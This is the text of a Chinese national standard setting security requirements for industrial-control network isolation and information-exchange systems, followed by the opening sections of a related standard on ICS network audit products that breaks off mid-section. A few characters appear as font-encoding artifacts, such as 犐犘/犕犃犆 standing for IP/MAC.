信息安全技术 工业控制网络安全 隔离与信息交换系统安全技术要求 Information security technology—Security technical requirements of industrial control system security isolation and information ferry system 随着工业化与信息化的深度融合,来自信息网络的安全威胁正逐步对工业控制系统造成极大的安 全威胁,通用网络安全隔离与信息交换系统在面对工业控制系统的安全防护时显得力不从心,因此需要 一种能应用于工业控制环境的网络安全隔离与信息交换系统对工业控制系统进行安全防护。 应用于工业控制环境的网络安全隔离与信息交换系统与通用网络安全隔离与信息交换系统的主要 差异体现在: — 通用网络安全隔离与信息交换系统除了需具备基本的五元组过滤外,还需要具备 一 定的应用 层过滤防护能力。 用于工业控制环境的网络安全隔离与信息交换系统除了具有通用网络安全 隔离与信息交换系统的部分通用协议应用层过滤能力外,还需要具有对工业控制协议应用层 的过滤能力。 — 结合工业控制环境中当前的信息安全防护技术水平,以及信息安全防护不得影响系统功能的 正常运行,通用网络安全隔离与信息交换系统所要求的强制访问控制要求还不能够适应于工 业控制环境。 — 工业控制环境下的网络安全隔离与信息交换系统比通用网络安全隔离与信息交换系统具有更 高的可用性、可靠性、稳定性等要求。 信息安全技术 工业控制网络安全 隔离与信息交换系统安全技术要求 1 范围 本标准规定了工业控制网络安全隔离与信息交换系统的安全功能要求、自身安全要求和安全保障 要求。 本标准适用于工业控制网络安全隔离与信息交换系统的设计、开发及测试。 2 规范性引用文件 下列文件对于本文件的应用是必不可少的。 凡是注日期的引用文件,仅注日期的版本适用于本文 件。 凡是不注日期的引用文件,其最新版本(包括所有的修改单)适用于本文件。 GB/T20279 — 2015 信息安全技术 网络和终端隔离产品安全技术要求 GB/T20438 . 3 — 2017 电气/电子/可编程电子安全相关系统的功能安全 第 3部分:软件要求 GB/T20438 . 4 — 2017 电气/电子/可编程电子安全相关系统的功能安全 第 4部分:定义和缩 略语 GB/T25069 — 2010 信息安全技术 术语 3 术语和定义 GB/T20279 — 2015、GB/T20438 . 4 — 2017和 GB/T25069 — 2010界定的以及下列术语和定义适 用于本文件。 3.1 工业控制系统 工业控制系统(ICS)是一个通用术语,它包括多种工业生产中使用的控制系统,包括监控和数据采 集系统(SCADA)、分布式控制系统(DCS)和其他较小的控制系统,如可编程逻辑控制器(PLC),现已广 泛应用在工业部门和关键基础设施中。 [GB/T32919 — 2016,定义 3 . 1] 工业控制协议:工业控制系统中,上位机与控制设备之间,以及控制设备与控制设备之间的通信报文规约。 注:通常包括模拟量和数字量的读写控制。 工业 控 制 网 络 安 全 隔 离 与 信 息 交 换 系 统 :部署于工业控制网络中不同的安全域之间,采用协议隔离技术实现两个安全域之间访问控制、协议 转换、内容过滤和信息交换等功能的产品。 下列缩略语适用于本文件。 MAC:媒体接入控制(MediaAccessControl) OPC:用于过程控制的对象链接与嵌入(ObjectLinkingandEmbeddingforProcessControl) 工业控制网络安全隔离与信息交换系统通常部署在工业控制网络边界,保护的资产为工业控制网 络;或者部署在生产管理层与过程监控层之间,保护的资产为过程监控层网络及现场控制层网络。 此 外,工业控制网络安全隔离与信息交换系统本身及其内部的重要数据也是受保护的资产。 工业控制网络安全隔离与信息交换系统一般以二主机加专用隔离部件的方式组成,即由内部处理 单元、外部处理单元和专用隔离部件组成。 其中,专用隔离部件既可以是采用包含电子开关并固化信息 摆渡控制逻辑的专用隔离芯片构成的隔离交换板卡,也可以是经过安全强化的运行专用信息传输逻辑 控制程序的主机。 工业控制网络安全隔离与信息交换系统中的内、外部处理单元通过专用隔离部件相 连,专用隔离部件是两个安全域之间唯一 的可信物理信道。 该内部信道裁剪了 TCP/IP等公共网络协 议栈,采用私有协议实现公共协议隔离。 专用隔离部件通常有两种实现方式:一是采用私有协议以逻辑 方式实现协议隔离和信息传输;二是采用一组互斥的分时切换电子开关实现内部物理信道的通断控制, 以分时切换连接方式完成信息摆渡,从而在两个安全域之间形成一个不存在实时物理连接的隔离区。 安全技术要求 6 . 1 基本级安全技术要求 6 . 1 . 1 安全功能要求 6 . 1 . 1 . 1 访问控制 6 . 1 . 1 . 1 . 1 基于白名单的访问控制 产品应采用白名单的访问控制策略,即非访问控制策略明确允许的访问,需默认禁止。 6 . 1 . 1 . 1 . 2 网络层访问控制 产品应支持基于源IP、源端口、目的IP、目的端口、传输层协议等要求进行访问控制。 6 . 1 . 1 . 1 . 3 应用层访问控制 产品应支持应用层的访问控制: a) 支持 HTTP、FTP、TELNET等应用的识别与访问控制; b) 至少支持一种工业控制协议的访问控制。 6 . 1 . 1 . 1 . 4 工业控制协议深度检查 产品应支持对工业控制协议内容进行深度分析和访问控制: a) 对所支持的工业控制协议进行协议规约检查,明确拒绝不符合协议规约的访问; b) 应支持对工业控制协议的操作类型、操作对象、操作范围等参数进行访问控制; c) 若支持 OPC协议:应支持基于控制点名称、读写操作等要素进行控制; d) 若支持 ModbusTCP协议:应支持基于设备 ID、功能码类型、读写操作、寄存器地址、控制值范 围等要素进行控制。 6 . 1 . 1 . 2 协议隔离 所有主客体之间发送和接收的信息流均执行网络层协议剥离,还原成应用层数据,在两机之间以非 TCP/IP的私有协议格式传输。 6 . 1 . 1 . 3 残余信息保护 在为所有内部或外部网络上的主机连接进行资源分配时,安全功能应保证其分配的资源中不提供 以前连接活动中所产生的任何信息内容。 6 . 1 . 1 . 4 不可旁路 在与安全有关的操作(例如安全属性的修改、内部网络主机向外部网络主机传送信息等)被允许执 行之前,安全功能应确保其通过安全功能策略的检查。 6 . 1 . 1 . 5 抗攻击 产品应具备抵御 SYNFlood攻击、UDPFlood攻击、ICMPFlood攻击、Pingofdeath攻击等典型拒 绝服务攻击能力。 6 . 1 . 2 自身安全要求 6 . 1 . 2 . 1 标识和鉴别 6 . 1 . 2 . 1 . 1 唯 一 性标识 产品应保证任何用户都具有唯一 的标识。 6 . 1 . 2 . 1 . 2 管理员属性定义 产品应为每个管理员规定与之相关的安全属性,如管理员标识、鉴别信息、隶属组、权限等,并提供 使用默认值对创建的每个管理员的属性进行初始化的功能。 6 . 1 . 2 . 1 . 3 基本鉴别 产品应保证任何用户在执行安全功能前都要进行身份鉴别。 6 . 1 . 2 . 1 . 4 鉴别失败处理 产品应为管理员登录设定一个授权管理员可修改的鉴别尝试阈值,当管理员的不成功登录尝试超 过阈值,系统应通过技术手段阻止管理员的进一 步鉴别请求。 6 . 1 . 2 . 2 安全管理 6 . 1 . 2 . 2 . 1 接口及管理安全 产品应保证业务接口、管理接口、管理界面的安全: a) 业务接口和管理接口采用不同的网络接口; b) 管理接口及管理界面不存在中高风险安全漏洞。 6 . 1 . 2 . 2 . 2 安全状态监测 产品应能够监测产品自身及组件状态,包括对产品 CPU、内存、存储空间等系统资源使用状态进行 监测。 6 . 1 . 2 . 3 数据完整性 安全功能应保护储存于设备中的鉴别数据和信息传输策略不受未授权查阅、修改和破坏。 6 . 1 . 2 . 4 时间同步 产品应支持与外部时间服务器进行时间同步。 6 . 1 . 2 . 5 高可用性 6 . 1 . 2 . 5 . 1 容错 产品应具备一定的容错能力: a) 重要程序及文件被破坏时,设备重启后能够自恢复; b) 重要进程异常终止时,能够自启动。 6 . 1 . 2 . 5 . 2 安全策略更新 进行访问控制安全策略应用时不应该影响正常的数据通信。 6 . 1 . 2 . 6 审计日志 6 . 1 . 2 . 6 . 1 业务日志生成 产品应对其提供的业务功能生成审计日志: a) 访问控制策略匹配的访问请求,包括允许及禁止的访问请求; b) 识别及防护的各类攻击行为。 6 . 1 . 2 . 6 . 2 业务日志内容 业务日志内容至少包括: a) 日期、时间、源目的 MAC、源目的IP、源目的端口、协议类型; b) 工业控制协议的操作类型、操作对象、操作值等相关参数; c) 攻击事件的类型及描述。 6 . 1 . 2 . 6 . 3 系统日志生成 产品应对与自身安全相关的以下事件生成审计日志: a) 身份鉴别,包括成功和失败; b) 因鉴别失败次数超过阈值而采取的禁止进一 步尝试的措施; c) 访问控制策略的增加、删除、修改; 6 . 1 . 2 . 6 . 4 系统日志内容 系统日志内容至少应包括日期、时间、事件主体、事件客体、事件描述等。 6 . 1 . 2 . 6 . 5 审计日志管理 应支持日志管理功能,具体技术要求如下: a) 应只允许授权管理员能够对审计日志进行读取、存档、导出、删除和清空等操作; b) 应提供能查阅日志的工具; c) 审计事件应存储于掉电非易失性存储介质中,且在存储空间达到阈值时至少能够通知授权审 计员。 6 . 1 . 3 安全保障要求 6 . 1 . 3 . 1 开发 6 . 1 . 3 . 1 . 1 安全架构 开发者应提供产品安全功能的安全架构描述,技术要求如下: a) 与产品设计文档中对安全功能的描述一致; b) 描述与安全功能要求一致的安全域; c) 描述产品安全功能初始化过程及安全措施; d) 证实产品安全功能能够防止被破坏; e) 证实产品安全功能能够防止安全策略被旁路。 6 . 1 . 3 . 1 . 2 功能规范 开发者应提供完备的功能规范说明,技术要求如下: a) 完整描述产品的安全功能; b) 描述所有安全功能接口的目的与使用方法; c) 标识和描述每个安全功能接口相关的所有参数; d) 描述安全功能接口相关的安全功能实施行为; e) 描述由安全功能实施行为而引起的直接错误消息; f) 证实安全功能要求到安全功能接口的追溯。 6 . 1 . 3 . 1 . 3 产品设计 开发者应提供产品设计文档,技术要求如下: a) 根据子系统描述产品结构,并标识和描述产品安全功能的所有子系统; b) 描述安全功能所有子系统间的相互作用; c) 提供的映射关系能够证实设计中描述的所有行为能够映射到调用它的安全功能接口。 6 . 1 . 3 . 2 指导性文档 6 . 1 . 3 . 2 . 1 操作用户指南 开发者应提供明确和合理的操作用户指南,操作用户指南与为评估而提供的其他所有文档保持 一 致,对每一种用户角色的描述要求如下: a) 描述授权用户可访问的功能和特权,包含适当的警示信息; b) 描述如何以安全的方式使用产品提供的接口; c) 描述可用功能和接口,尤其是受用户控制的所有安全参数,适当时指明安全值; d) 明确说明与需要执行的用户可访问功能有关的每 一 种安全相关事件,包括改变安全功能所控 制实体的安全特性; e) 标识产品运行的所有可能状态(包括操作导致的失败或者操作性错误),以及它们与维持安全 运行之间的因果关系和联系; f) 实现安全目的所应执行的安全策略。 6 . 1 . 3 . 2 . 2 准备程序 开发者应提供产品及其准备程序,技术要求如下: a) 描述与开发者交付程序相一致的安全接收所交付产品必需的所有步骤; b) 描述安全安装产品及其运行环境必需的所有步骤。 6 . 1 . 3 . 3 生命周期支持 6 . 1 . 3 . 3 . 1 配置管理能力 开发者的配置管理能力应满足以下要求: a) 为产品的不同版本提供唯一 的标识; b) 使用配置管理系统对组成产品的所有配置项进行维护,并唯一标识各配置项; c) 提供配置管理文档,配置管理文档描述用于唯一标识配置项的方法。 6 . 1 . 3 . 3 . 2 配置管理范围 开发者应提供产品配置项列表,并说明配置项的开发者。 配置项列表至少包括产品、安全保障要求 的评估证据和产品的组成部分。 6 . 1 . 3 . 3 . 3 交付程序 开发者应使用一定的交付程序交付产品,并将交付过程文档化。 在给用户方交付产品的各版本时, 交付文档应描述为维护安全所必需的所有程序。 6 . 1 . 3 . 3 . 4 支撑系统安全保障 开发者应明确产品支撑系统的安全保障措施,技术要求如下: a) 若产品以软件形态提交,应在交付文档中详细描述支撑操作系统的兼容性、可靠性、安全性 要求; b) 若产品以硬件形态提交,应选取和采用安全可靠的支撑操作系统,以最小化原则选取必要的系 统组件,并采取一定的加固措施。 6 . 1 . 3 . 3 . 5 硬件安全保障 若产品以硬件形态提交,开发者应采取措施保障硬件安全,技术要求如下: a) 产品应采用具有高可靠性的硬件平台; b) 若硬件平台为外购,应制定相应程序对硬件提供商进行管理、对采购的硬件平台或部件进行验 证测试,并要求硬件提供商提供合格证明及必要的第三方环境适用性测试报告。 6 . 1 . 3 . 4 测试 6 . 1 . 3 . 4 . 1 测试覆盖 开发者应提供测试覆盖文档,测试覆盖描述应表明测试文档中所标识的测试与功能规范中所描述 的产品的安全功能间的对应性。 6 . 1 . 3 . 4 . 2 功能测试 开发者应测试产品安全功能,将结果文档化并提供测试文档。 测试文档应包括以下内容: a) 测试计划,标识要执行的测试,并描述执行每个测试的方案,这些方案包括对于其他测试结果 的任何顺序依赖性; b) 预期的测试结果,表明测试成功后的预期输出; c) 实际测试结果和预期的测试结果一致 。 6 . 1 . 3 . 4 . 3 独立测试 开发者应提供一组与其自测安全功能时使用的同等资源,以用于安全功能的抽样测试。 6 . 1 . 3 . 5 脆弱性评定 基于已标识的潜在脆弱性,产品能够抵抗基本的攻击。 6 . 2 增强级安全技术要求 6 . 2 . 1 安全功能要求 6 . 2 . 1 . 1 访问控制 6 . 2 . 1 . 1 . 1 基于白名单的访问控制 产品应采用白名单的访问控制策略,即非访问控制策略明确允许的访问,需默认禁止。 6 . 2 . 1 . 1 . 2 网络层访问控制 产品应支持基于源IP、源端口、目的IP、目的端口、传输层协议等要求进行访问控制。 6 . 2 . 1 . 1 . 3 犐犘/犕犃犆地址绑定 产品应支持自动或管理员手工绑定与其进行通信的设备的 犐犘/犕犃犆地址,当通信的 犐犘、犕犃犆地址 与绑定列表不符时,应阻止通信。 6 . 2 . 1 . 1 . 4 应用层访问控制 产品应支持应用层的访问控制: a) 支持 HTTP、FTP、TELNET等应用的识别与访问控制; b) 至少支持两种工业控制协议的访问控制。 6 . 2 . 1 . 1 . 5 工业控制协议深度检查 产品应支持对工业控制协议内容进行深度分析和访问控制: a) 对所支持的工业控制协议进行协议规约检查,明确拒绝不符合协议规约的访问; b) 应支持对工业控制协议的操作类型、操作对象、操作范围等参数进行访问控制; c) 若支持 OPC协议:应支持基于控制点名称、读写操作等要素进行控制; d) 若支持 ModbusTCP协议:应支持基于设备 ID、功能码类型、读写操作、寄存器地址、控制值范 围等要素进行控制。 6 . 2 . 1 . 2 协议隔离 所有主客体之间发送和接收的信息流均执行网络层协议剥离,还原成应用层数据,在两机之间以非 TCP/IP的私有协议格式传输。 6 . 2 . 1 . 3 信息摆渡 设备双机之间应采用专用隔离部件,并确保数据传输链路物理上的时分切换,即设备的双机在物理 链路上不能同时与专用隔离部件连通,并完成信息摆渡。 6 . 2 . 1 . 4 残余信息保护 在为所有内部或外部网络上的主机连接进行资源分配时,安全功能应保证其分配的资源中不提供 以前连接活动中所产生的任何信息内容。 6 . 2 . 1 . 5 不可旁路 在与安全有关的操作(例如安全属性的修改、内部网络主机向外部网络主机传送信息等)被允许执 行之前,安全功能应确保其通过安全功能策略的检查。 6 . 2 . 1 . 6 抗攻击 产品应具备一定的抗拒绝服务攻击能力: a) SYNFlood攻击、UDPFlood攻击、ICMPFlood攻击、Pingofdeath攻击等; b) 犜犲犪狉犇狉狅狆攻击、犔犪狀犱攻击等。 6 . 2 . 1 . 7 双机热备 产品应具备双机热备的能力,当主设备出现故障时或者主设备链路故障时,备用设备应能及时接管 进行工作。 6 . 2 . 2 自身安全要求 6 . 2 . 2 . 1 标识和鉴别 6 . 2 . 2 . 1 . 1 唯 一 性标识 产品应保证任何用户都具有唯一 的标识。 6 . 2 . 2 . 1 . 2 管理员属性定义 产品应为每个管理员规定与之相关的安全属性,如管理员标识、鉴别信息、隶属组、权限等,并提供 使用默认值对创建的每个管理员的属性进行初始化的功能。 6 . 2 . 2 . 1 . 3 管理员角色 产品应为管理角色进行分级,使不同级别的管理角色具有不同的管理权限。 各管理角色的权限应 形成互相制约关系。 6 . 2 . 2 . 1 . 4 基本鉴别 产品应保证任何用户在执行安全功能前都要进行身份鉴别。 若其采用网络远程方式管理,还应对 可管理的地址进行限制。 6 . 2 . 2 . 1 . 5 多鉴别 产品应能向管理角色提供除口令身份鉴别机制以外的其他身份鉴别机制(如证书、智能犐犆卡、指纹 等鉴别机制)。 6 . 2 . 2 . 1 . 6 超时锁定或注销 当已通过身份鉴别的管理角色空闲操作的时间超过规定值,在该管理角色需要执行管理功能前,产 品应对该管理角色的身份重新进行鉴别。 6 . 2 . 2 . 1 . 7 鉴别失败处理 产品应为管理员登录设定一个授权管理员可修改的鉴别尝试阈值,当管理员的不成功登录尝试超 过阈值,系统应通过技术手段阻止管理员的进一 步鉴别请求。 6 . 2 . 2 . 2 安全管理 6 . 2 . 2 . 2 . 1 接口及管理安全 产品应保证业务接口、管理接口、管理界面的安全: a) 应支持业务接口和管理接口采用不同的网络接口; b) 管理接口及管理界面不存在中高风险安全漏洞。 6 . 2 . 2 . 2 . 2 管理信息传输安全 产品需要通过网络进行管理时,产品应能对管理信息进行保密传输。 6 . 2 . 2 . 2 . 3 安全状态监测 产品应能够监测产品自身及组件状态,包括: a) 对产品 CPU、内存、存储空间等系统资源使用状态进行监测; b) 对产品的主要功能模块运行状态进行监测。 6 . 2 . 2 . 3 数据完整性 安全功能应保护储存于设备中的鉴别数据和信息传输策略不受未授权查阅、修改和破坏。 6 . 2 . 2 . 4 时间同步 产品应支持与外部时间服务器进行时间同步。 6 . 2 . 2 . 5 高可用性 6 . 2 . 2 . 5 . 1 容错 产品应具备一定的容错能力: a) 重要程序及文件被破坏时,设备重启后能够自恢复; b) 重要进程异常终止时,能够自启动。 6 . 2 . 2 . 5 . 2 安全策略更新 进行访问控制安全策略下装及应用时不应影响正常的数据通信。 6 . 2 . 2 . 6 审计日志 6 . 2 . 2 . 6 . 1 业务日志生成 产品应对其提供的业务功能生成审计日志: a) 访问控制策略匹配的访问请求,包括允许及禁止的访问请求; b) 识别及防护的各类攻击行为。 6 . 2 . 2 . 6 . 2 业务日志内容 业务日志内容至少包括: a) 日期、时间、源目的 MAC、源目的IP、源目的端口、协议类型; b) 工业控制协议的操作类型、操作对象、操作值等相关参数; c) 攻击事件的类型及描述。 6 . 2 . 2 . 6 . 3 系统日志生成 产品应对与自身安全相关的以下事件生成审计日志: a) 身份鉴别,包括成功和失败; b) 因鉴别失败次数超过阈值而采取的禁止进一 步尝试的措施; c) 访问控制策略的增加、删除、修改; d) 管理员的增加、删除、修改; e) 时间同步; f) 超过保存时限的审计记录和自身审计日志的自动删除; g) 审计日志和审计记录的备份与恢复; h) 存储空间达到阈值报警; i) 其他事件。 6 . 2 . 2 . 6 . 4 系统日志内容 系统日志内容至少应包括日期、时间、事件主体、事件客体、事件描述等。 6 . 2 . 2 . 6 . 5 审计日志管理 应支持日志管理功能,具体技术要求如下: a) 应只允许授权管理员能够对审计日志进行读取、存档、导出、删除和清空等操作; b) 应提供能查阅日志的工具,支持多条件对审计日志进行组合查询; c) 审计事件应存储于掉电非易失性存储介质中,且在存储空间达到阈值时至少能够通知授权审 计员; d) 应支持以标准格式将审计日志外发到专用的日志服务器。 6 . 2 . 3 安全保障要求 6 . 2 . 3 . 1 开发 6 . 2 . 3 . 1 . 1 安全架构 开发者应提供产品安全功能的安全架构描述,技术要求如下: a) 与产品设计文档中对安全功能的描述一致; b) 描述与安全功能要求一致的安全域; c) 描述产品安全功能初始化过程及安全措施; d) 证实产品安全功能能够防止被破坏; e) 证实产品安全功能能够防止安全策略被旁路。 6 . 2 . 3 . 1 . 2 功能规范 开发者应提供完备的功能规范说明,技术要求如下: a) 完整描述产品的安全功能; b) 描述所有安全功能接口的目的与使用方法; c) 标识和描述每个安全功能接口相关的所有参数; d) 描述安全功能接口相关的安全功能实施行为; e) 描述由安全功能实施行为而引起的直接错误消息; f) 证实安全功能要求到安全功能接口的追溯; g) 描述安全功能实施过程中,与安全功能接口相关的所有行为; h) 描述可能由安全功能接口的调用而引起的所有错误消息。 6 . 2 . 3 . 1 . 3 实现表示 开发者应提供全部安全功能的实现表示,技术要求如下: a) 提供产品设计描述与实现表示实例之间的映射,并证明其 一 致性; b) 详细定义产品安全功能,达到无须进 一 步设计就能生成安全功能的程度; c) 实现表示以开发人员使用的形式提供。 6 . 2 . 3 . 1 . 4 产品设计 开发者应提供产品设计文档,技术要求如下: a) 根据子系统描述产品结构,并标识和描述产品安全功能的所有子系统; b) 描述安全功能所有子系统间的相互作用; c) 提供的映射关系能够证实设计中描述的所有行为能够映射到调用它的安全功能接口; d) 根据模块描述安全功能,并提供安全功能子系统到模块间的映射关系; e) 描述所有安全功能实现模块,包括其目的及与其他模块间的相互关系; f) 描述所有模块的安全功能要求相关接口、与其他相邻接口的调用参数及返回值; g) 描述所有安全功能的支撑或相关模块,包括其目的及与其他模块间的相互作用。 6 . 2 . 3 . 2 指导性文档 6 . 2 . 3 . 2 . 1 操作用户指南 开发者应提供明确和合理的操作用户指南,操作用户指南与为评估而提供的其他所有文档保持 一 致,对每一种用户角色的描述要求如下: a) 描述授权用户可访问的功能和特权,包含适当的警示信息; b) 描述如何以安全的方式使用产品提供的接口; c) 描述可用功能和接口,尤其是受用户控制的所有安全参数,适当时指明安全值; d) 明确说明与需要执行的用户可访问功能有关的每 一 种安全相关事件,包括改变安全功能所控 制实体的安全特性; e) 标识产品运行的所有可能状态(包括操作导致的失败或者操作性错误),以及它们与维持安全 运行之间的因果关系和联系; f) 实现安全目的所应执行的安全策略。 6 . 2 . 3 . 2 . 2 准备程序 开发者应提供产品及其准备程序,技术要求如下: a) 描述与开发者交付程序相一致的安全接收所交付产品必需的所有步骤; b) 描述安全安装产品及其运行环境必需的所有步骤。 6 . 2 . 3 . 3 生命周期支持 6 . 2 . 3 . 3 . 1 配置管理能力 开发者的配置管理能力应满足以下要求: a) 为产品的不同版本提供唯一 的标识; b) 使用配置管理系统对组成产品的所有配置项进行维护,并唯一标识各配置项; c) 提供配置管理文档,配置管理文档描述用于唯一标识配置项的方法; d) 配置管理系统提供 一 种自动方式来支持产品的生成,并确保只能对配置项进行已授权的变更; e) 配置管理文档包括配置管理计划,计划中需描述如何使用配置管理系统,并依据该计划实施配 置管理; f) 配置管理计划应描述配置项的变更(包括新建、修改、删除)控制程序。 6 . 2 . 3 . 3 . 2 配置管理范围 开发者应提供产品配置项列表,并说明配置项的开发者,技术要求如下: a) 产品、安全保障要求的评估证据和产品的组成部分; b) 实现表示、安全缺陷报告及其解决状态。 6 . 2 . 3 . 3 . 3 交付程序 开发者应使用一定的交付程序交付产品,并将交付过程文档化。 在给用户方交付产品的各版本时, 交付文档应描述为维护安全所必需的所有程序。 6 . 2 . 3 . 3 . 4 开发安全 开发者应提供开发安全文档。 开发安全文档应描述在产品的开发环境中,为保护产品设计和实现 的保密性和完整性所必需的所有物理的、程序的、人员的和其他方面的安全措施。 6 . 2 . 3 . 3 . 5 生命周期定义 开发者应建立 一个生命周期模型对产品的开发和维护进行的必要控制,并提供生命周期定义文档 描述用于开发和维护产品的模型。 6 . 2 . 3 . 3 . 6 工具和技术 开发者应明确定义用于开发产品的工具,并提供开发工具文档无歧义的定义实现中所有语句的含 义和所有依赖选项的含义。 6 . 2 . 3 . 3 . 7 支撑系统安全保障 开发者应明确产品支撑系统的安全保障措施,技术要求如下: a) 若产品以软件形态提交,应在交付文档中详细描述支撑操作系统的兼容性、可靠性、安全性 要求; b) 若产品以硬件形态提交,应选取和采用安全可靠的支撑操作系统,以最小化原则选取必要的系 统组件,并采取一定的加固措施。 6 . 2 . 3 . 3 . 8 硬件安全保障 若产品以硬件形态提交,开发者应采取措施保障硬件安全,技术要求如下: a) 产品应采用具有高可靠性的硬件平台; b) 若硬件平台为外购,应制定相应程序对硬件提供商进行管理、对采购的硬件平台或部件进行验 证测试,并要求硬件提供商提供合格证明及必要的第三方环境适用性测试报告。 6 . 2 . 3 . 4 测试 6 . 2 . 3 . 4 . 1 测试覆盖 开发者应提供测试覆盖文档,技术要求如下: a) 证实测试文档中所标识的测试与功能规范中所描述的产品的安全功能间的对应性; b) 证实功能规范中的所有安全功能接口都进行了测试。 6 . 2 . 3 . 4 . 2 测试深度 开发者应提供测试深度的分析,技术要求如下: a) 证实测试文档中的测试与产品设计中的安全功能子系统和实现模块之间的 一 致性; b) 证实产品设计中的所有安全功能子系统、实现模块都已经进行过测试。 6 . 2 . 3 . 4 . 3 功能测试 开发者应测试产品安全功能,将结果文档化并提供测试文档。 测试文档应包括以下内容: a) 测试计划,标识要执行的测试,并描述执行每个测试的方案,这些方案包括对于其他测试结果 的任何顺序依赖性; b) 预期的测试结果,表明测试成功后的预期输出; c) 实际测试结果和预期的测试结果一致 。 6 . 2 . 3 . 4 . 4 功能安全测试 开发者应按照 犌犅/犜20438.3 — 2017中 7.9的要求进行产品软件功能安全测试。 6 . 2 . 3 . 4 . 5 独立测试 开发者应提供一组与其自测安全功能时使用的同等资源,以用于安全功能的抽样测试。 6 . 2 . 3 . 5 脆弱性评定 基于已标识的潜在脆弱性,产品能够抵抗较强的攻击。
standards
信息安全技术 工业控制系统网络审计 产品安全技术要求 Information security technology—Security technical requirements of industrial control system network audit products 随着工业化与信息化的深度融合,来自信息网络的安全威胁正逐步对工业控制系统造成极大的安 全威胁,通用安全审计产品在面对工业控制系统的安全防护时显得力不从心,因此急需要一种能应用于 工业控制环境的安全审计产品对工业控制系统进行安全防护。 应用于工业控制环境的安全审计产品与通用安全审计产品的主要差异体现在: ——通用安全审计产品主要针对应用于互联网的通用协议进行分析和记录。用于工业控制环境的 安全审计产品除了能够分析部分互联网的通用协议外,还应具有对工业控制协议的深度解释 能力,而无需对电子邮件等工业控制系统中不会使用的通用协议。 ——用于工业控制环境的安全审计产品可能有部分组件部署在工业现场环境,因此比通用安全审 计产品需具有更高的环境适应能力。 ——工业控制环境中,通常流量相对较小,流量类型相对固定,对可靠性要求更高,用于工业控制环 境的安全审计产品能够支持全流量审计,并要求支持采用基于白名单方式对审计信息进行 分析。 范围 本标准规定了工业控制系统网络审计产品的安全技术要求,包括安全功能要求、自身安全要求和安 全保障要求。 本标准适用于工业控制系统网络审计产品的设计、生产和测试。 2 规范性引用文件 下列文件对于本文件的应用是必不可少的。凡是注日期的引用文件,仅注日期的版本适用于本文 件。凡是不注日期的引用文件,其最新版本(包括所有的修改单)适用于本文件。 GB/T 2423.5—1995 电工电子产品环境试验 第2部分:试验方法 试验 Ea 和导则:冲击 GB/T 2423.8—1995 电工电子产品环境试验 第 2 部分:试验方法 试验 Ed: 自由跌落 GB/T 2423.10—2008 电工电子产品环境试验 第2部分:试验方法 试验 Fc: 振动(正弦) GB/T 4208—2017 外壳防护等级(IP 代码) GB4824—2013 工业、科学和医疗(ISM) 射频设备 骚扰特性 限值和测量方法 GB/T 9254—2008 信息技术设备的无线电骚扰限值和测量方法 GB/T 13729—2002 :远动终端设备 GB/T 15153.1—1998 远动设备及系统 第2部分:工作条件 第1篇:电源和电磁兼容性 GB/T 17214.4—2005 工业过程测量和控制装置的工作条件 第4部分:腐蚀和侵蚀影响 GB/T 17626.2—2018 电磁兼容 试验和测量技术 静电放电抗扰度试验 GB/T 17626.3—2016 电磁兼容 试验和测量技术 射频电磁场辐射抗扰度试验 GB/T 17626.4—2018 电磁兼容 试验和测量技术 电快速瞬变脉冲群抗扰度试验 GB/T 17626.5—2008 电磁兼容 试验和测量技术 浪涌(冲击)抗扰度试验 GB/T 17626.6—2017 电磁兼容 试验和测量技术 射频场感应的传导骚扰抗扰度 GB/T 17626.8—2006 电磁兼容 试验和测量技术 工频磁场抗扰度试验 GB/T 17626.10—2017 电磁兼容 试验和测量技术 阻尼振荡磁场抗扰度试验 GB/T 17626.11—2008 电磁兼容 试验和测量技术 电压暂降、短时中断和电压变化的抗扰度 试验 GB/T17626.12—2013 电磁兼容 试验和测量技术 振铃波抗扰度试验 GB/T 17626.16—2007 电磁兼容 试验和测量技术 0 Hz~150 kHz 共模传导骚扰抗扰度试验 GB/T 17626.17—2005 电磁兼容 试验和测量技术 直流电源输入端口纹波抗扰度试验 GB/T 17626.18—2016 电磁兼容 试验和测量技术 阻尼振荡波抗扰度试验 GB/T 17626.29—2006 电磁兼容 试验和测量技术 直流电源输入端口电压暂降、短时中断和 电压变化的抗扰度试验 GB/T 20945—2013 信息安全技术信息系统安全审计产品技术要求和测试评价方法 GB/T 25069—2010 信息安全技术术语 GB/T 32919—2016 信息安全技术工业控制系统安全控制应用指南 3 术语和定义 GB/T 20945—2013、GB/T 25069—2010 和 GB/T32919—2016 界定的以及下列术语和定义适用 于本文件。 3.1 工业控制协议 industrial control protocol 工业控制系统中,上位机与控制设备之间以及控制设备与控制设备之间的通信报文规约。 注:通常包括模拟量和数字量的读写控制。 3.2 工业控制系统网络审计产品 industrial control system network audit products 部署于工业控制网络中,对工业控制系统中的事件进行记录和分析,并针对特定事件采取相应匹配 动作的产品。 4 缩略语 下列缩略语适用于本文件。 MAC: 媒体接入控制(Media Access Control) SMS: 短信服务(Short Message Service) SNMP: 简单网络管理协议(Simple Network Management Protocol) URL: 统一资源定位符(Uniform Resource Locator) 5 产品描述 工业控制系统网络审计产品的结构一般分为两种: 一种是一体化设备,将数据采集和分析功能集中 在一台硬件中,统一完成审计分析功能;另一种是由采集端和分析端两部分组成,采集端主要提供数据 采集的功能,将采集到的网络数据发送给分析端,由分析端进一步处理和分析,采取相应的响应措施,并 支持采集端分布式部署。该产品典型部署场景参见附录 A。 本标准将工业控制系统网络审计产品安全技术要求分为安全功能要求、自身安全要求和安全保障 要求三个大类。安全功能要求、自身安全要求和安全保障要求分为基本级和增强级,与基本级内容相 比,增强级中要求有所增加或变更的内容在正文中通过“宋体加粗”表示。若产品全部或部分组件部署 在工业控制现场,应根据实际需求满足附录 B 环境适应性要求。 6 安全技术要求 6.1 基本级安全技术要求 6.1.1 安全功能要求 6.1.1.1 审计数据采集 6.1.1.1.1 采集策略 产品应支持基于策略的数据采集: a) 支持基于网络层要素的数据采集策略:至少包括源目的 MAC 或源目的 IP、传输层协议、目的 端口; b) 支持基于工业控制协议的数据采集策略。 6.1.1.1.2 审计数据生成 产品应在实际的系统环境和网络带宽下及时生成审计数据。 6.1.1.2 审计数据还原 6.1.1.2.1 网络层通信协议还原 产品应支持对网络层通信协议的数据进行还原,至少包括源目的 MAC、源目的 IP、传输层协议、源 目的端口、应用层协议。 6.1.1.2.2 应用协议还原 产品应支持对 HTTP 、FTP 、TELNET 协议的应用数据还原: a) HTTP 通信:目标 URL; b) FTP 通信:使用的账号、输入命令; c) TELNET 通信:使用的账号、输入命令。 6.1.1.2.3 工业控制协议还原 